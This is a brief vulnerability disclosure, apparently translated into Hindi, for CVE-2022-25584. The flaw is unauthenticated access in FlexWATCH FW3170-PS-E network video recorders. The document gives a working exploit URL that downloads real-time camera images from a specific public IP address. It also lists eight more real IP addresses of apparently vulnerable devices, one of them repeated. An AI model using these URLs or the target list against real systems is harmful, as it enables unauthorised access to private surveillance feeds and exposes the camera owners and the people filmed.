
Flexwatch-CVE
Flexwatch-CVE
यह दस्तावेज़ CVE-2022-25584 के लिए है "RESERVED"
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25584

यह कमजोरी CNVD द्वारा अनुक्रमित की गई है, लेकिन अभी तक सार्वजनिक नहीं की गई है
CNVD ID:CNVD-2021-103443

पुनरुत्पादन के लिए कमजोरी:
हमने पाया कि Seyeon Tech Co., Ltd. के स्वामित्व वाला FlexWATCH FW3170-PS-E Network Video System 4.23-3000_GY एक अनप्रमाणित पहुँच कमजोरी रखता है, जिसका हमलावर निगरानी छवियाँ प्राप्त करने और संवेदनशील जानकारी लीक करने के लिए शोषण कर सकते हैं
उदाहरण के लिए:
http://211.174.227.102:10001/app/multi/single.asp

फिर, हम यहाँ जा सकते हैं:http://211.174.227.102:10001/cgi-bin/fwcamimgsave.cgi?FwModId=0&PortId=0&FwCgiVer=0x0001
रियल-टाइम स्क्रीन की निगरानी डाउनलोड करें


कंपनी की आधिकारिक वेबसाइट:http://www.flexwatch.com/
अन्य मामले:
http://211.240.10.38:10001/app/multi/single.asp
http://121.133.21.35:10001/app/multi/single.asp
http://210.223.145.159:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://115.142.194.178:10001/app/multi/single.asp
http://27.1.124.18:10001/app/multi/single.asp
http://183.100.61.196:10001/app/multi/single.asp
http://118.176.196.247:10001/app/multi/single.asp